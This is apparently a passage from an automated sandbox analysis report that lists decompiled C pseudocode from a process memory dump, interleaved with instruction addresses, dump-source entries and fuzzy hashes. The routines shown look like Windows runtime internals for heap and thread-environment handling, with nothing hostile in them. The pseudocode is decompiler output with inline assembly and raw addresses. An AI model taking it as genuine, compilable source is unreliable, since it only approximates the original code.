                                                              					_push(0x6b);
                                                              					_t44 = E04BDAA90();
                                                              					_v20 = _t44;
                                                              					if(_t44 >= 0) {
                                                              						E04BDFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x4c884c0 * 0xc);
                                                              						_t38 = _t35;
                                                              						if(_t35 < _v8 + _t35) {
                                                              							do {
                                                              								asm("movsd");
                                                              								asm("movsd");
                                                              								asm("movsd");
                                                              								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
                                                              							} while (_t38 < _v8 + _t35);
                                                              							_t44 = _v20;
                                                              						}
                                                              					}
                                                              					_t26 =  *0x4c884c4; // 0x0
                                                              					L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
                                                              				}
                                                              				return _t44;
                                                              			}












                                                              0x04bc3b89
                                                              0x04bc3b96
                                                              0x04bc3ba1
                                                              0x04bc3bab
                                                              0x04bc3bb5
                                                              0x04bc3bb9
                                                              0x04c06298
                                                              0x04bc3bbf
                                                              0x04bc3bc2
                                                              0x04bc3bc3
                                                              0x04bc3bc9
                                                              0x04bc3bca
                                                              0x04bc3bcc
                                                              0x04bc3bcd
                                                              0x04bc3bd4
                                                              0x04bc3bd6
                                                              0x04bc3bdb
                                                              0x04bc3bea
                                                              0x04bc3bf7
                                                              0x04bc3bfb
                                                              0x04bc3bff
                                                              0x04bc3c09
                                                              0x04bc3c0a
                                                              0x04bc3c0b
                                                              0x04bc3c0f
                                                              0x04bc3c14
                                                              0x04bc3c18
                                                              0x04bc3c18
                                                              0x04bc3bfb
                                                              0x04bc3c1b
                                                              0x04bc3c30
                                                              0x04bc3c30
                                                              0x04bc3c3d

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fec23fc1840d491a4b66e6dd3974dbcbbfa24bbd94f38d9349c8fff6485eb2a0
                                                              • Instruction ID: 62718a0360d9e0cf1570d503954f3c2d5c782c110af757376c3cb53fc5efaf20
                                                              • Opcode Fuzzy Hash: fec23fc1840d491a4b66e6dd3974dbcbbfa24bbd94f38d9349c8fff6485eb2a0
                                                              • Instruction Fuzzy Hash: 7E218E73A00118AFD700DF98CD81B6AB7BEFB84708F5540A8E909AB251D775BD118BA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 80%
                                                              			E04C16CF0(void* __edx, intOrPtr _a4, short _a8) {
                                                              				char _v8;
                                                              				char _v12;
                                                              				char _v16;
                                                              				char _v20;
                                                              				char _v28;
                                                              				char _v36;
                                                              				char _v52;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				void* __ebp;
                                                              				signed char* _t21;
                                                              				void* _t24;
                                                              				void* _t36;
                                                              				void* _t38;
                                                              				void* _t46;
                                                              
                                                              				_push(_t36);
                                                              				_t46 = __edx;
                                                              				_v12 = 0;
                                                              				_v8 = 0;
                                                              				_v20 = 0;
                                                              				_v16 = 0;
                                                              				if(E04BB7D50() == 0) {
                                                              					_t21 = 0x7ffe0384;
                                                              				} else {
                                                              					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
                                                              				}
                                                              				if( *_t21 != 0) {
                                                              					_t21 =  *[fs:0x30];
                                                              					if((_t21[0x240] & 0x00000004) != 0) {
                                                              						if(E04BB7D50() == 0) {
                                                              							_t21 = 0x7ffe0385;
                                                              						} else {
                                                              							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
                                                              						}
                                                              						if(( *_t21 & 0x00000020) != 0) {
                                                              							_t56 = _t46;
                                                              							if(_t46 == 0) {
                                                              								_t46 = 0x4b75c80;
                                                              							}
                                                              							_push(_t46);
                                                              							_push( &_v12);
                                                              							_t24 = E04BCF6E0(_t36, 0, _t46, _t56);
                                                              							_push(_a4);
                                                              							_t38 = _t24;
                                                              							_push( &_v28);
                                                              							_t21 = E04BCF6E0(_t38, 0, _t46, _t56);
                                                              							if(_t38 != 0) {
                                                              								if(_t21 != 0) {
                                                              									E04C17016(_a8, 0, 0, 0,  &_v36,  &_v28);
                                                              									L04BB2400( &_v52);
                                                              								}
                                                              								_t21 = L04BB2400( &_v28);
                                                              							}
                                                              						}
                                                              					}
                                                              				}
                                                              				return _t21;
                                                              			}



















                                                              0x04c16cfb
                                                              0x04c16d00
                                                              0x04c16d02
                                                              0x04c16d06
                                                              0x04c16d0a
                                                              0x04c16d0e
                                                              0x04c16d19
                                                              0x04c16d2b
                                                              0x04c16d1b
                                                              0x04c16d24
                                                              0x04c16d24
                                                              0x04c16d33
                                                              0x04c16d39
                                                              0x04c16d46
                                                              0x04c16d4f
                                                              0x04c16d61
                                                              0x04c16d51
                                                              0x04c16d5a
                                                              0x04c16d5a
                                                              0x04c16d69
                                                              0x04c16d6b
                                                              0x04c16d6d
                                                              0x04c16d6f
                                                              0x04c16d6f
                                                              0x04c16d74
                                                              0x04c16d79
                                                              0x04c16d7a
                                                              0x04c16d7f
                                                              0x04c16d82
                                                              0x04c16d88
                                                              0x04c16d89
                                                              0x04c16d90
                                                              0x04c16d94
                                                              0x04c16da7
                                                              0x04c16db1
                                                              0x04c16db1
                                                              0x04c16dbb
                                                              0x04c16dbb
                                                              0x04c16d90
                                                              0x04c16d69
                                                              0x04c16d46
                                                              0x04c16dc6

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 65d059210cfc7830b98962718d4b7756027de355321d94600cdbdf5ade3ba571
                                                              • Instruction ID: fbd4576f6596e34aaf6351e7cfcf8e833dde9ea841142a3349373ab5f6bc0432
                                                              • Opcode Fuzzy Hash: 65d059210cfc7830b98962718d4b7756027de355321d94600cdbdf5ade3ba571
                                                              • Instruction Fuzzy Hash: 6E21C5726043449FD711EF69C944BA7B7EDEF82748F0405AAF980C7261EB34E609D6A2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 67%
                                                              			E04C6070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                                              				char _v8;
                                                              				intOrPtr _v11;
                                                              				signed int _v12;
                                                              				intOrPtr _v15;
                                                              				signed int _v16;
                                                              				intOrPtr _v28;
                                                              				void* __ebx;
                                                              				char* _t32;
                                                              				signed int* _t38;
                                                              				signed int _t60;
                                                              
                                                              				_t38 = __ecx;
                                                              				_v16 = __edx;
                                                              				_t60 = E04C607DF(__ecx, __edx,  &_a4,  &_a8, 2);
                                                              				if(_t60 != 0) {
                                                              					_t7 = _t38 + 0x38; // 0x29cd5903
                                                              					_push( *_t7);
                                                              					_t9 = _t38 + 0x34; // 0x6adeeb00
                                                              					_push( *_t9);
                                                              					_v12 = _a8 << 0xc;
                                                              					_t11 = _t38 + 4; // 0x5de58b5b
                                                              					_push(0x4000);
                                                              					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
                                                              					E04C5AFDE( &_v8,  &_v12);
                                                              					E04C61293(_t38, _v28, _t60);
                                                              					if(E04BB7D50() == 0) {
                                                              						_t32 = 0x7ffe0380;
                                                              					} else {
                                                              						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                              					}
                                                              					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                              						_t21 = _t38 + 0x3c; // 0xc3595e5f
                                                              						E04C514FB(_t38,  *_t21, _v11, _v15, 0xd);
                                                              					}
                                                              				}
                                                              				return  ~_t60;
                                                              			}













                                                              0x04c6071b
                                                              0x04c60724
                                                              0x04c60734
                                                              0x04c60738
                                                              0x04c6074b
                                                              0x04c6074b
                                                              0x04c60753
                                                              0x04c60753
                                                              0x04c60759
                                                              0x04c6075d
                                                              0x04c60774
                                                              0x04c60779
                                                              0x04c6077d
                                                              0x04c60789
                                                              0x04c60795
                                                              0x04c607a7
                                                              0x04c60797
                                                              0x04c607a0
                                                              0x04c607a0
                                                              0x04c607af
                                                              0x04c607c4
                                                              0x04c607cd
                                                              0x04c607cd
                                                              0x04c607af
                                                              0x04c607dc

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                              • Instruction ID: f8b879e928446e87be7fe8643bd6a42ce69f71e6f404d30037c56557f2656c0b
                                                              • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                              • Instruction Fuzzy Hash: 1C2104362042009FD705DF19C884B6ABBE6EFC4350F08C669F9969B395DB30ED09CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 96%
                                                              			E04BBAE73(intOrPtr __ecx, void* __edx) {
                                                              				intOrPtr _v8;
                                                              				void* _t19;
                                                              				char* _t22;
                                                              				signed char* _t24;
                                                              				intOrPtr _t25;
                                                              				intOrPtr _t27;
                                                              				void* _t31;
                                                              				intOrPtr _t36;
                                                              				char* _t38;
                                                              				signed char* _t42;
                                                              
                                                              				_push(__ecx);
                                                              				_t31 = __edx;
                                                              				_v8 = __ecx;
                                                              				_t19 = E04BB7D50();
                                                              				_t38 = 0x7ffe0384;
                                                              				if(_t19 != 0) {
                                                              					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                              				} else {
                                                              					_t22 = 0x7ffe0384;
                                                              				}
                                                              				_t42 = 0x7ffe0385;
                                                              				if( *_t22 != 0) {
                                                              					if(E04BB7D50() == 0) {
                                                              						_t24 = 0x7ffe0385;
                                                              					} else {
                                                              						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                              					}
                                                              					if(( *_t24 & 0x00000010) != 0) {
                                                              						goto L17;
                                                              					} else {
                                                              						goto L3;
                                                              					}
                                                              				} else {
                                                              					L3:
                                                              					_t27 = E04BB7D50();
                                                              					if(_t27 != 0) {
                                                              						_t27 =  *[fs:0x30];
                                                              						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
                                                              					}
                                                              					if( *_t38 != 0) {
                                                              						_t27 =  *[fs:0x30];
                                                              						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
                                                              							goto L5;
                                                              						}
                                                              						_t27 = E04BB7D50();
                                                              						if(_t27 != 0) {
                                                              							_t27 =  *[fs:0x30];
                                                              							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
                                                              						}
                                                              						if(( *_t42 & 0x00000020) != 0) {
                                                              							L17:
                                                              							_t25 = _v8;
                                                              							_t36 = 0;
                                                              							if(_t25 != 0) {
                                                              								_t36 =  *((intOrPtr*)(_t25 + 0x18));
                                                              							}
                                                              							_t27 = E04C17794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
                                                              						}
                                                              						goto L5;
                                                              					} else {
                                                              						L5:
                                                              						return _t27;
                                                              					}
                                                              				}
                                                              			}













                                                              0x04bbae78
                                                              0x04bbae7c
                                                              0x04bbae7e
                                                              0x04bbae81
                                                              0x04bbae86
                                                              0x04bbae8d
                                                              0x04c02691
                                                              0x04bbae93
                                                              0x04bbae93
                                                              0x04bbae93
                                                              0x04bbae98
                                                              0x04bbae9d
                                                              0x04c026a2
                                                              0x04c026b4
                                                              0x04c026a4
                                                              0x04c026ad
                                                              0x04c026ad
                                                              0x04c026b9
                                                              0x00000000
                                                              0x04c026bb
                                                              0x00000000
                                                              0x04c026bb
                                                              0x04bbaea3
                                                              0x04bbaea3
                                                              0x04bbaea3
                                                              0x04bbaeaa
                                                              0x04c026c0
                                                              0x04c026c9
                                                              0x04c026c9
                                                              0x04bbaeb3
                                                              0x04c026d4
                                                              0x04c026e1
                                                              0x00000000
                                                              0x00000000
                                                              0x04c026e7
                                                              0x04c026ee
                                                              0x04c026f0
                                                              0x04c026f9
                                                              0x04c026f9
                                                              0x04c02702
                                                              0x04c02708
                                                              0x04c02708
                                                              0x04c0270b
                                                              0x04c0270f
                                                              0x04c02711
                                                              0x04c02711
                                                              0x04c02725
                                                              0x04c02725
                                                              0x00000000
                                                              0x04bbaeb9
                                                              0x04bbaeb9
                                                              0x04bbaebf
                                                              0x04bbaebf
                                                              0x04bbaeb3

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                              • Instruction ID: fea29c296a50bc9bb06606930de2e5841025639ce69ff4fadbb91a569cc51797
                                                              • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                              • Instruction Fuzzy Hash: 1E210471A01680DFEB229B28C988B7977EAEF44344F1904E1DC448B6E2EBB4FD40D6D0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 82%
                                                              			E04C17794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                                              				intOrPtr _v8;
                                                              				intOrPtr _v12;
                                                              				intOrPtr _t21;
                                                              				void* _t24;
                                                              				intOrPtr _t25;
                                                              				void* _t36;
                                                              				short _t39;
                                                              				signed char* _t42;
                                                              				unsigned int _t46;
                                                              				void* _t50;
                                                              
                                                              				_push(__ecx);
                                                              				_push(__ecx);
                                                              				_t21 =  *0x4c87b9c; // 0x0
                                                              				_t46 = _a8;
                                                              				_v12 = __edx;
                                                              				_v8 = __ecx;
                                                              				_t4 = _t46 + 0x2e; // 0x2e
                                                              				_t36 = _t4;
                                                              				_t24 = L04BB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
                                                              				_t50 = _t24;
                                                              				if(_t50 != 0) {
                                                              					_t25 = _a4;
                                                              					if(_t25 == 5) {
                                                              						L3:
                                                              						_t39 = 0x14b1;
                                                              					} else {
                                                              						_t39 = 0x14b0;
                                                              						if(_t25 == 6) {
                                                              							goto L3;
                                                              						}
                                                              					}
                                                              					 *((short*)(_t50 + 6)) = _t39;
                                                              					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
                                                              					_t11 = _t50 + 0x2c; // 0x2c
                                                              					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
                                                              					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
                                                              					E04BDF3E0(_t11, _a12, _t46);
                                                              					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
                                                              					if(E04BB7D50() == 0) {
                                                              						_t42 = 0x7ffe0384;
                                                              					} else {
                                                              						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                              					}
                                                              					_push(_t50);
                                                              					_t19 = _t36 - 0x20; // 0xe
                                                              					_push(0x403);
                                                              					_push( *_t42 & 0x000000ff);
                                                              					E04BD9AE0();
                                                              					_t24 = L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
                                                              				}
                                                              				return _t24;
                                                              			}













                                                              0x04c17799
                                                              0x04c1779a
                                                              0x04c1779b
                                                              0x04c177a3
                                                              0x04c177ab
                                                              0x04c177ae
                                                              0x04c177b1
                                                              0x04c177b1
                                                              0x04c177bf
                                                              0x04c177c4
                                                              0x04c177c8
                                                              0x04c177ce
                                                              0x04c177d4
                                                              0x04c177e0
                                                              0x04c177e0
                                                              0x04c177d6
                                                              0x04c177d6
                                                              0x04c177de
                                                              0x00000000
                                                              0x00000000
                                                              0x04c177de
                                                              0x04c177e5
                                                              0x04c177f0
                                                              0x04c177f3
                                                              0x04c177f6
                                                              0x04c177fd
                                                              0x04c17800
                                                              0x04c1780c
                                                              0x04c17818
                                                              0x04c1782b
                                                              0x04c1781a
                                                              0x04c17823
                                                              0x04c17823
                                                              0x04c17830
                                                              0x04c17831
                                                              0x04c17838
                                                              0x04c1783d
                                                              0x04c1783e
                                                              0x04c1784f
                                                              0x04c1784f
                                                              0x04c1785a

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c38ea8c9fa61f9a0625e38e39b20097de7df7c48e9092beea0ce8b3d61337b70
                                                              • Instruction ID: 3d2c9e87dd089617aef6cfecb9971ae1a56452b8932127d550bd04a762cdf5c4
                                                              • Opcode Fuzzy Hash: c38ea8c9fa61f9a0625e38e39b20097de7df7c48e9092beea0ce8b3d61337b70
                                                              • Instruction Fuzzy Hash: BA21A172901604ABD725DF69DC80EABB7A9EF89340F1045ADF50AD7760EA34EA00CB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 93%
                                                              			E04BCFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                              				intOrPtr _v8;
                                                              				void* _t19;
                                                              				intOrPtr _t29;
                                                              				intOrPtr _t32;
                                                              				intOrPtr _t35;
                                                              				intOrPtr _t37;
                                                              				intOrPtr* _t40;
                                                              
                                                              				_t35 = __edx;
                                                              				_push(__ecx);
                                                              				_push(__ecx);
                                                              				_t37 = 0;
                                                              				_v8 = __edx;
                                                              				_t29 = __ecx;
                                                              				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
                                                              					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
                                                              					L3:
                                                              					_t19 = _a4 - 4;
                                                              					if(_t19 != 0) {
                                                              						if(_t19 != 1) {
                                                              							L7:
                                                              							return _t37;
                                                              						}
                                                              						if(_t35 == 0) {
                                                              							L11:
                                                              							_t37 = 0xc000000d;
                                                              							goto L7;
                                                              						}
                                                              						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
                                                              							L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
                                                              							_t35 = _v8;
                                                              						}
                                                              						 *((intOrPtr*)(_t40 + 4)) = _t35;
                                                              						goto L7;
                                                              					}
                                                              					if(_t29 == 0) {
                                                              						goto L11;
                                                              					}
                                                              					_t32 =  *_t40;
                                                              					if(_t32 != 0) {
                                                              						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
                                                              						E04BA76E2( *_t40);
                                                              					}
                                                              					 *_t40 = _t29;
                                                              					goto L7;
                                                              				}
                                                              				_t40 = L04BB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
                                                              				if(_t40 == 0) {
                                                              					_t37 = 0xc0000017;
                                                              					goto L7;
                                                              				}
                                                              				_t35 = _v8;
                                                              				 *_t40 = 0;
                                                              				 *((intOrPtr*)(_t40 + 4)) = 0;
                                                              				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
                                                              				goto L3;
                                                              			}










                                                              0x04bcfd9b
                                                              0x04bcfda0
                                                              0x04bcfda1
                                                              0x04bcfdab
                                                              0x04bcfdad
                                                              0x04bcfdb0
                                                              0x04bcfdb8
                                                              0x04bcfe0f
                                                              0x04bcfde6
                                                              0x04bcfde9
                                                              0x04bcfdec
                                                              0x04c0c0c0
                                                              0x04bcfdfe
                                                              0x04bcfe06
                                                              0x04bcfe06
                                                              0x04c0c0c8
                                                              0x04bcfe2d
                                                              0x04bcfe2d
                                                              0x00000000
                                                              0x04bcfe2d
                                                              0x04c0c0d1
                                                              0x04c0c0e0
                                                              0x04c0c0e5
                                                              0x04c0c0e5
                                                              0x04c0c0e8
                                                              0x00000000
                                                              0x04c0c0e8
                                                              0x04bcfdf4
                                                              0x00000000
                                                              0x00000000
                                                              0x04bcfdf6
                                                              0x04bcfdfa
                                                              0x04bcfe1a
                                                              0x04bcfe1f
                                                              0x04bcfe1f
                                                              0x04bcfdfc
                                                              0x00000000
                                                              0x04bcfdfc
                                                              0x04bcfdcc
                                                              0x04bcfdd0
                                                              0x04bcfe26
                                                              0x00000000
                                                              0x04bcfe26
                                                              0x04bcfdd8
                                                              0x04bcfddb
                                                              0x04bcfddd
                                                              0x04bcfde0
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                              • Instruction ID: f42b0234af3c5491a956027c0dff03d10ad5ef8a8fa968492c26bc57c0599a4f
                                                              • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                              • Instruction Fuzzy Hash: A7217C72600A41DBD735CF0AC580A76B7E6EB94B10F2485EEE94587651E730BD00EB80
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 77%
                                                              			E04B99240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                              				intOrPtr _t33;
                                                              				intOrPtr _t37;
                                                              				intOrPtr _t41;
                                                              				intOrPtr* _t46;
                                                              				void* _t48;
                                                              				intOrPtr _t50;
                                                              				intOrPtr* _t60;
                                                              				void* _t61;
                                                              				intOrPtr _t62;
                                                              				intOrPtr _t65;
                                                              				void* _t66;
                                                              				void* _t68;
                                                              
                                                              				_push(0xc);
                                                              				_push(0x4c6f708);
                                                              				E04BED08C(__ebx, __edi, __esi);
                                                              				_t65 = __ecx;
                                                              				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
                                                              				if( *(__ecx + 0x24) != 0) {
                                                              					_push( *(__ecx + 0x24));
                                                              					E04BD95D0();
                                                              					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
                                                              				}
                                                              				L6();
                                                              				L6();
                                                              				_push( *((intOrPtr*)(_t65 + 0x28)));
                                                              				E04BD95D0();
                                                              				_t33 =  *0x4c884c4; // 0x0
                                                              				L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
                                                              				_t37 =  *0x4c884c4; // 0x0
                                                              				L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
                                                              				_t41 =  *0x4c884c4; // 0x0
                                                              				E04BB2280(L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x4c886b4);
                                                              				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
                                                              				_t46 = _t65 + 0xe8;
                                                              				_t62 =  *_t46;
                                                              				_t60 =  *((intOrPtr*)(_t46 + 4));
                                                              				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
                                                              					_t61 = 3;
                                                              					asm("int 0x29");
                                                              					_push(_t65);
                                                              					_t66 = _t61;
                                                              					_t23 = _t66 + 0x14; // 0x8df8084c
                                                              					_push( *_t23);
                                                              					E04BD95D0();
                                                              					_t24 = _t66 + 0x10; // 0x89e04d8b
                                                              					_push( *_t24);
                                                              					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
                                                              					_t48 = E04BD95D0();
                                                              					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
                                                              					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
                                                              					return _t48;
                                                              				} else {
                                                              					 *_t60 = _t62;
                                                              					 *((intOrPtr*)(_t62 + 4)) = _t60;
                                                              					 *(_t68 - 4) = 0xfffffffe;
                                                              					E04B99325();
                                                              					_t50 =  *0x4c884c4; // 0x0
                                                              					return E04BED0D1(L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
                                                              				}
                                                              			}















                                                              0x04b99240
                                                              0x04b99242
                                                              0x04b99247
                                                              0x04b9924c
                                                              0x04b9924e
                                                              0x04b99255
                                                              0x04b99257
                                                              0x04b9925a
                                                              0x04b9925f
                                                              0x04b9925f
                                                              0x04b99266
                                                              0x04b99271
                                                              0x04b99276
                                                              0x04b99279
                                                              0x04b9927e
                                                              0x04b99295
                                                              0x04b9929a
                                                              0x04b992b1
                                                              0x04b992b6
                                                              0x04b992d7
                                                              0x04b992dc
                                                              0x04b992e0
                                                              0x04b992e6
                                                              0x04b992e8
                                                              0x04b992ee
                                                              0x04b99332
                                                              0x04b99333
                                                              0x04b99337
                                                              0x04b99338
                                                              0x04b9933a
                                                              0x04b9933a
                                                              0x04b9933d
                                                              0x04b99342
                                                              0x04b99342
                                                              0x04b99345
                                                              0x04b99349
                                                              0x04b9934e
                                                              0x04b99352
                                                              0x04b99357
                                                              0x04b992f4
                                                              0x04b992f4
                                                              0x04b992f6
                                                              0x04b992f9
                                                              0x04b99300
                                                              0x04b99306
                                                              0x04b99324
                                                              0x04b99324

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: ef64a7d6cc501b14629001245e47fc9016d1e77505f33b67a984eee397aec517
                                                              • Instruction ID: cfb8936afb453423e7876f5c9b861d34dbc4570b2a107a89a34587cae6e4061a
                                                              • Opcode Fuzzy Hash: ef64a7d6cc501b14629001245e47fc9016d1e77505f33b67a984eee397aec517
                                                              • Instruction Fuzzy Hash: D8214872040640EFDB61EF28CA50F69B7F9FF48708F5545ACA0498BAA2CB74F941CB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 54%
                                                              			E04BCB390(void* __ecx, intOrPtr _a4) {
                                                              				signed int _v8;
                                                              				signed char _t12;
                                                              				signed int _t16;
                                                              				signed int _t21;
                                                              				void* _t28;
                                                              				signed int _t30;
                                                              				signed int _t36;
                                                              				signed int _t41;
                                                              
                                                              				_push(__ecx);
                                                              				_t41 = _a4 + 0xffffffb8;
                                                              				E04BB2280(_t12, 0x4c88608);
                                                              				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
                                                              				asm("sbb edi, edi");
                                                              				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
                                                              				_v8 = _t36;
                                                              				asm("lock cmpxchg [ebx], ecx");
                                                              				_t30 = 1;
                                                              				if(1 != 1) {
                                                              					while(1) {
                                                              						_t21 = _t30 & 0x00000006;
                                                              						_t16 = _t30;
                                                              						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
                                                              						asm("lock cmpxchg [edi], esi");
                                                              						if(_t16 == _t30) {
                                                              							break;
                                                              						}
                                                              						_t30 = _t16;
                                                              					}
                                                              					_t36 = _v8;
                                                              					if(_t21 == 2) {
                                                              						_t16 = E04BD00C2(0x4c88608, 0, _t28);
                                                              					}
                                                              				}
                                                              				if(_t36 != 0) {
                                                              					_t16 = L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
                                                              				}
                                                              				return _t16;
                                                              			}











                                                              0x04bcb395
                                                              0x04bcb3a2
                                                              0x04bcb3a5
                                                              0x04bcb3aa
                                                              0x04bcb3b2
                                                              0x04bcb3ba
                                                              0x04bcb3bd
                                                              0x04bcb3c0
                                                              0x04bcb3c4
                                                              0x04bcb3c9
                                                              0x04c0a3e9
                                                              0x04c0a3ed
                                                              0x04c0a3f0
                                                              0x04c0a3ff
                                                              0x04c0a403
                                                              0x04c0a409
                                                              0x00000000
                                                              0x00000000
